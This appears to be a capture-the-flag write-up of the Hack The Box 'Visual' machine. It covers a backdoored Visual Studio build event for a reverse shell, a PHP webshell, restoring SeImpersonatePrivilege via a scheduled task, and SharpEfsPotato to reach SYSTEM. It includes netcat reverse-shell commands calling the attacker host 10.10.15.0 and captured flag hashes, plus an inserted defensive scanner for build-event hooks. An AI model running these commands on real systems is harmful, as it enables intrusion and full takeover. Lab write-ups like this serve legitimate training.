Visual builds a Visual Studio project from a given repository; we used custom build events inside a project to run a shell. Once inside, we ran a shell from XAMPP, which gave us access as Local Service, recovered the SeImpersonate privilege, and then reached System through SharpEfsPotato.
nmap shows only the HTTP port (80) open.
# Nmap 7.94 scan initiated Mon Oct 23 16:40:18 2023 as: nmap -p80 -sV -sC -oN nmap_scan 10.10.11.234
Nmap scan report for 10.10.11.234
Host is up (0.064s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 23 16:40:31 2023 -- 1 IP address (1 host up) scanned in 12.15 seconds
The site's description states that it compiles Visual Studio projects from a given repository and supports .NET 6.0 and C# programs.
We find a form that expects a URL and is submitted with the POST method to /submit.php.
<form action="/submit.php" method="POST">
  <h2 class="h4 mb-4">Submit Your Repo</h2>
  <div class="mb-3">
    <input type="url" name="gitRepoLink" class="form-control" placeholder="Enter Git Repo URL" required>
  </div>
  <button type="submit" class="btn btn-primary">Submit</button>
</form>
Directory Brute Forcing
feroxbuster lists the site's resources, among them the /uploads and /webalizer directories.
π ~/htb/visual ❯ feroxbuster -u http://10.10.11.234/ -w $MD
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.234/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 0l 0w 0c http://10.10.11.234/submit.php
200 GET 7l 36w 336c http://10.10.11.234/js/scripts.js
200 GET 8l 29w 28898c http://10.10.11.234/assets/favicon.ico
301 GET 9l 30w 339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/
200 GET 11559l 23754w 250218c http://10.10.11.234/css/styles.css
200 GET 117l 555w 7534c http://10.10.11.234/
301 GET 9l 30w 338c http://10.10.11.234/assets => http://10.10.11.234/assets/
301 GET 9l 30w 335c http://10.10.11.234/css => http://10.10.11.234/css/
301 GET 9l 30w 334c http://10.10.11.234/js => http://10.10.11.234/js/
503 GET 11l 44w 402c http://10.10.11.234/examples
403 GET 11l 47w 421c http://10.10.11.234/licenses
301 GET 9l 30w 338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/
200 GET 8l 29w 28898c http://10.10.11.234/Assets/favicon.ico
301 GET 9l 30w 335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/
200 GET 11559l 23754w 250218c http://10.10.11.234/CSS/styles.css
301 GET 9l 30w 334c http://10.10.11.234/JS => http://10.10.11.234/JS/
200 GET 7l 36w 336c http://10.10.11.234/JS/scripts.js
403 GET 11l 47w 421c http://10.10.11.234/phpmyadmin
301 GET 9l 30w 339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/
403 GET 11l 47w 421c http://10.10.11.234/webalizer
403 GET 11l 47w 421c http://10.10.11.234/server-status
Visual Studio
The site expects a repository URL, so we pointed it at an HTTP server of our own to see which requests it makes; after submitting the address the site shows a waiting message.
The server log shows that it tries to fetch the refs file.
π ~/htb/visual/www ❯ httphere .
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [30/Oct/2023 19:23:47] code 404, message File not found
10.10.11.234 - - [30/Oct/2023 19:23:47] "GET /info/refs?service=git-upload-pack HTTP/1.1" 404 -
On the site's side, the status page reports that it did not find the .sln file.
Project
With Visual Studio we created a new project from the console application template, finally selecting .NET version 6.0.
Our project's code is a single hello-world line.
Console.WriteLine("Hello, World!");
Repository
We created a git repository for our project, added a README file and made a commit.
π ~/htb/visual ❯ mkdir superapp
π ~/htb/visual ❯ cd superapp
π ~/htb/visual/superapp ❯ git init
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
Initialized empty Git repository in /home/kali/htb/visual/superapp/.git/
π superapp master ❯ echo "hey" > README.md
π superapp master ✗ ❯ git add README.md
π superapp master ✗ ❯ git commit -m '1 file.'
[master (root-commit) 1265ccb] 1 file.
 1 file changed, 1 insertion(+)
 create mode 100644 README.md
π superapp master ❯
Git HTTP Server
We ran Git HTTP Server, which serves git repositories over HTTP; in this case we started it one folder above our repository.
# install
# npm install -g git-http-server
π superapp master ❯ cd ..
π ~/htb/visual ❯ ll
total 24K
-rw-r--r-- 1 kali kali 590 Oct 30 18:40 nmap_scan
drwxr-xr-x 3 kali kali 4.0K Oct 30 19:36 superapp
drwxr-xr-x 2 kali kali 4.0K Oct 30 28:57 www
π ~/htb/visual ❯ git-http-server -p 9090
listening on http://0.0.0.0:9090 in /home/kali/htb/visual
We ran a quick test and confirmed that it works correctly.
Researching malicious Visual Studio projects, we came across several articles (1, 2, 3) about attacks using backdoored Visual Studio projects; they mention custom build events, which run when a project is compiled, although they only show them for C++ projects.
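As an added example (not from this write-up and not the box's own code), the check a build service like this one could run on a cloned repository before invoking MSBuild: it parses project files for the constructs the articles above describe, build-event properties, Exec tasks and imported build logic, and refuses to build when any is present. The sample project strings and the file globs are constructed for illustration.

```python
# Added example (not the write-up's or the box's own code): a pre-build check a
# service like Visual could run on a cloned repository before invoking MSBuild.
from pathlib import Path
import xml.etree.ElementTree as ET

# Properties whose value is a command line run by the build-event targets.
BUILD_EVENT_PROPERTIES = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}
# Exec runs an arbitrary command; Import/UsingTask pull in external build logic.
EXTERNAL_LOGIC = {"Import", "UsingTask"}
PROJECT_GLOBS = ("*.csproj", "*.vcxproj", "*.props", "*.targets")

def local_name(tag: str) -> str:
    """Strip the XML namespace; legacy .csproj/.vcxproj use the MSBuild 2003 namespace."""
    return tag.rsplit("}", 1)[-1]

def find_build_commands(project_xml: str) -> list[tuple[str, str]]:
    """Return (kind, value) pairs for every command-running or logic-importing
    construct: build-event properties, Exec tasks, Import and UsingTask elements."""
    root = ET.fromstring(project_xml)
    findings = []
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in BUILD_EVENT_PROPERTIES and (elem.text or "").strip():
            findings.append((name, elem.text.strip()))
        elif name == "Exec":
            findings.append((name, elem.get("Command", "").strip()))
        elif name in EXTERNAL_LOGIC:
            # Import uses Project=; UsingTask uses AssemblyFile= or TaskFactory= (inline code)
            ref = elem.get("Project") or elem.get("AssemblyFile") or elem.get("TaskFactory") or ""
            findings.append((name, ref))
    return findings

def is_safe_to_build(project_xml: str) -> bool:
    """A service building untrusted repositories should refuse any project that
    carries build-time commands; only the project's source is meant to be compiled."""
    return not find_build_commands(project_xml)

def scan_repository(repo_dir: str) -> dict[str, list[tuple[str, str]]]:
    """Map each project-related file under repo_dir to its findings (empty list = clean)."""
    report = {}
    for pattern in PROJECT_GLOBS:
        for path in Path(repo_dir).rglob(pattern):
            try:
                report[str(path)] = find_build_commands(path.read_text(encoding="utf-8-sig"))
            except ET.ParseError as exc:
                report[str(path)] = [("ParseError", str(exc))]  # unparsable: treat as unsafe
    return report

# Constructed sample projects (not taken from the target) for a self-check.
SAMPLE_SDK_PROJECT = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><TargetFramework>net6.0</TargetFramework></PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="echo build started" />
  </Target>
</Project>"""
SAMPLE_LEGACY_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup><PostBuildEvent>echo build finished</PostBuildEvent></PropertyGroup>
</Project>"""
SAMPLE_CLEAN_PROJECT = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><TargetFramework>net6.0</TargetFramework></PropertyGroup>
</Project>"""
```

Note that the SDK-style .NET 6 project still carries a hook (a Target bound to PreBuildEvent with an Exec task), so a scanner that only looks for the legacy PreBuildEvent/PostBuildEvent properties would miss it.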
A few seconds after submitting our repository we obtained a reverse shell as enox.
π repo master ✗ ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN) [10.10.11.234] 49677
Windows PowerShell running as user enox on VISUAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\Temp\6a611821b24c46589efb4bbbb16d08\visualapp> whoami
visual\enox
PS C:\Windows\Temp\6a611821b24c46589efb4bbbb16d08\visualapp>
This lets us read our user.txt flag.
PS C:\users\enox> cd desktop
PS C:\users\enox\desktop> dir
Directory: C:\users\enox\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/24/2023 5:29 PM 34 user.txt
PS C:\users\enox\desktop> cat user.txt
f7c8abcd62c61e6b417e07d6e1134e5e
PS C:\users\enox\desktop>
Privesc
We list the users: Administrator and enox stand out the most, and the groups of the latter show nothing interesting.
PS C:\Windows\Temp\faddcf9f2af0361211fe87c08aadfc\superdupperapp> net users
User accounts for \\VISUAL
-------------------------------------------------------------------------------
Administrator DefaultAccount enox
Guest WDAGUtilityAccount
The command completed successfully.
PS C:\Windows\Temp\faddcf9f2af0361211fe87c08aadfc\superdupperapp> whoami /groups
GROUP INFORMATION
-----------------
Group Name                           Type             SID          Attributes
==================================================================================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PS C:\Windows\Temp\faddcf9f2af0361211fe87c08aadfc\superdupperapp>
We enumerate the processes, filtering by enox, to check whether any of them runs as System; none does, and the only one that catches our attention is httpd, which would be the Apache process.
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Build Status</title>
[... snip ...]
</head>
<body>
<?php
$logFilePath = __DIR__ . '/build.output'; // Path to the output file in the current directory

if (file_exists($logFilePath)) {
    $logContent = file_get_contents($logFilePath); // Get the content of the log file as a string

    if (preg_match("/succeeded\./i", $logContent)) {
        // Display directory listing
        $dir = getcwd(); // Get the current working directory
        $files = scandir($dir); // Get the list of files and directories in the directory
        echo "<h2>Download your files:</h2>";
        echo "<p class=\"success\">[+] Build succeeded!</p>";
        echo "<ul>";
        foreach ($files as $file) {
            if ($file != '.' && $file != '..' && $file != 'index.php' && $file != 'build.output') {
                echo "<li><a href=\"$file\" class=\"file-link\" download>$file</a></li>";
            }
        }
        echo "</ul>";
    } elseif (preg_match("/FAILED\./i", $logContent)) {
        // Notify the user about build failure and present the failed content
        echo "<p class=\"failure\">[!] Your build failed. Here are the lines with errors:</p>";
        echo "<div class=\"toggle-code\" onclick=\"toggleCodeBlock()\">Toggle Code</div>";
        echo "<div class=\"code-block\" id=\"codeBlock\">
            <pre>" . htmlspecialchars($logContent) . "</pre>
        </div>";
    } elseif (stripos($logContent, 'Invalid Repo') !== false) {
        // Repository doesn't contain a .sln file or the URL submitted is invalid
        echo "<p class=\"failure\">[-] The repository doesn't contain a .sln file or the URL submitted is invalid.</p>";
    } elseif (stripos($logContent, 'Timed Out') !== false) {
        // Build has timed out
        echo "<p class=\"timeout\">[x] Your build has timed out. Please submit again.</p>";
    } else {
        // Build is still in progress
        echo "<p>[-] Your build is still being compiled. Please be patient.</p>";
        $refreshInterval = 5; // Refresh every 5 seconds
        header("refresh: $refreshInterval");
    }
} else {
    // Output file doesn't exist
    echo "<p>[-] Your build is still being compiled. Please be patient.</p>";
    $refreshInterval = 5; // Refresh every 5 seconds
    header("refresh: $refreshInterval");
}
?>
<a href="/index.php" class="return-btn">Return to homepage</a>
<script>
// JavaScript code
// Function to toggle the visibility of the code block
function toggleCodeBlock() {
    var codeBlock = document.getElementById("codeBlock");
    codeBlock.style.display = codeBlock.style.display === "none" ? "block" : "none";
}
</script>
</body>
</html>
submit.php creates a new directory and copies vs_status.php into it as index.php to report the build status; the todo.txt file apparently serves as the reference for which repositories to build.
<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $gitRepoLink = $_POST['gitRepoLink'];

    // Sanitize URL
    $gitRepoLink = filter_var($gitRepoLink, FILTER_SANITIZE_URL);

    // Validate URL
    if (!filter_var($gitRepoLink, FILTER_VALIDATE_URL)) {
        echo '<script>alert("Invalid URL"); window.location = "/index.php";</script>';
        exit();
    }

    // Check scheme
    $parsed_url = parse_url($gitRepoLink);
    if ($parsed_url === false || !in_array($parsed_url['scheme'], ['http', 'https'])) {
        echo '<script>alert("Unsupported URL scheme"); window.location = "/index.php";</script>';
        exit();
    }

    $randV = bin2hex(random_bytes(15)); // Generate a random variable.
    $uploadPath = 'C:\\xampp\\htdocs\\uploads\\';
    $todoFilePath = $uploadPath . 'todo.txt';
    $newDirPath = $uploadPath . $randV;

    // Write to file
    $fileContent = "Git Repo Link: $gitRepoLink, Random Variable: $randV\n";
    file_put_contents($todoFilePath, $fileContent, FILE_APPEND | LOCK_EX);

    // Create a new directory
    if (!is_dir($newDirPath)) {
        mkdir($newDirPath, true);
    }

    // Copying vs_status.php to the directory, which displays compile status
    $sourceFile = 'C:\\xampp\\htdocs\\vs_status.php';
    $destinationFile = $newDirPath . '\\index.php';
    if (copy($sourceFile, $destinationFile)) {
        echo '[+] File copied successfully.';
    } else {
        echo '[-] Unable to copy the file.';
    }

    // Redirect to the new directory
    header('Location: /uploads/' . $randV);
}
?>
Local Service
We downloaded a small webshell into the site's folder.
After running whoami we see that the httpd service is running as Local Service.
π ~/htb/www ❯ curl -s "http://10.10.11.234/file.php?0=whoami"
nt authority\local service
nt authority\local service
π ~/htb/www ❯
We see that it holds only a few privileges.
π ~/htb/www ❯ curl -s "http://10.10.11.234/file.php?0=whoami%20/priv"
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
===================================================================
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
π ~/htb/www ❯
Privileges Back
A post by itm4n, Give Me Back My Privileges! Please?, explains a case where the NT AUTHORITY\LOCAL SERVICE user lacks SeImpersonatePrivilege, a privilege that would be "normal" for this account, and shows how to get it and other privileges back by creating a scheduled task (SeImpersonatePrivilege is a privilege that would let us escalate privileges).
To obtain this privilege we need to run the task, so we start a reverse shell with netcat, which we downloaded onto the machine. This shell now runs as Local Service.
# http://10.10.11.234/uploads/file.php?0=C:/Users/Public/Documents/nc.exe%20-e%20powershell%2010.10.15.0%201336
π ~/htb/visual ❯ rlwrap nc -lvp 1336
listening on [any] 1336 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN) [10.10.11.234] 49744
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
===================================================================
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs>
#1 Task
The first task gets this user's privileges back, but not all of them are present; the one we care about, SeImpersonatePrivilege, is missing.
π ~/htb/visual ❯ rlwrap nc -nlvp 1339
listening on [any] 1339 ...
connect to [10.10.15.0] from (UNKNOWN) [10.10.11.234] 49746
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                         State
========================================================================
SeAssignPrimaryTokenPrivilege Replace a process level token       Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Disabled
SeSystemtimePrivilege Change the system time Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\system32>
#2 Task - SeImpersonatePrivilege
The second task in the post shows that the privileges can be specified explicitly; however, we found that one of those privileges is not assigned and the task therefore does not run, so we specified SeImpersonatePrivilege as the only privilege.
After running the task we obtained a shell holding SeImpersonatePrivilege.
π ~/htb/visual ❯ rlwrap nc -lvp 1339
listening on [any] 1339 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN) [10.10.11.234] 49717
Microsoft Windows [Version 10.0.17763.4840]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name          Description                               State
=======================================================================
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
C:\Windows\system32>
SharpEfsPotato
SeImpersonatePrivilege can be abused with several different exploits, as listed in SeImpersonatePrivilege (3.1.1); in this case we managed to run whoami with SharpEfsPotato.
C:\Users\Public\Documents>sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content c:/file.log"
sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content c:/file.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/ec275b61-c7fd-4014-a16a-1acd5cb6b5a4/\ec275b61-c7fd-4014-a16a-1acd5cb6b5a4\ec275b61-c7fd-4014-a16a-1acd5cb6b5a4
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\Users\Public\Documents>more c:\file.log
more c:\file.log
nt authority\system
C:\Users\Public\Documents>
Shell
We ran SharpEfsPotato again, this time launching a reverse shell.
C:\Users\Public\Documents>sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "cd C:\users\public\documents\ ; .\nc.exe -e powershell.exe 10.10.15.0 1339"
sep.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "cd C:\users\public\documents\ ; .\nc.exe -e powershell.exe 10.10.15.0 1339"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/12d3e921-85df-476f-8bf5-4a34db9a925f/\12d3e921-85df-476f-8bf5-4a34db9a925f\12d3e921-85df-476f-8bf5-4a34db9a925f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\Users\Public\Documents>
After it runs we get a shell as System.
π ~/htb/visual ❯ rlwrap nc -lvp 1339
listening on [any] 1339 ...
10.10.11.234: inverse host lookup failed: Unknown host
connect to [10.10.15.0] from (UNKNOWN) [10.10.11.234] 49744
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\users\public\documents> whoami
whoami
nt authority\system
PS C:\users\public\documents> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                                                        State
==================================================================================================================
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\users\public\documents>
Finally, we read our root.txt flag.
PS C:\users\public\documents> cd c:/users/administrator/desktop
cd c:/users/administrator/desktop
PS C:\users\administrator\desktop> dir
dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/26/2023 11:22 AM 34 root.txt
PS C:\users\administrator\desktop> cat root.txt
cat root.txt
26bd25320fc5f626a0b1cc6fde8486c8
PS C:\users\administrator\desktop>
Fail
FullPowers Fail
We tried running FullPowers, which would automate creating the task that gives the privileges back, but it does not run.
C:\Users\Public\Documents>dir
Volume in drive C has no label.
Volume Serial Number is 82EF-5600
Directory of C:\Users\Public\Documents
10/26/2023 07:07 PM <DIR> .
10/26/2023 07:07 PM <DIR> ..
10/26/2023 07:07 PM 122,368 FullPowers.exe
10/26/2023 07:06 PM 59,392 nc.exe
2 File(s) 181,760 bytes
2 Dir(s) 9,539,039,232 bytes free
C:\Users\Public\Documents>FullPowers.exe
C:\Users\Public\Documents>
GodPotato
GodPotato did spawn a reverse shell, but the shell died a second after the connection was made.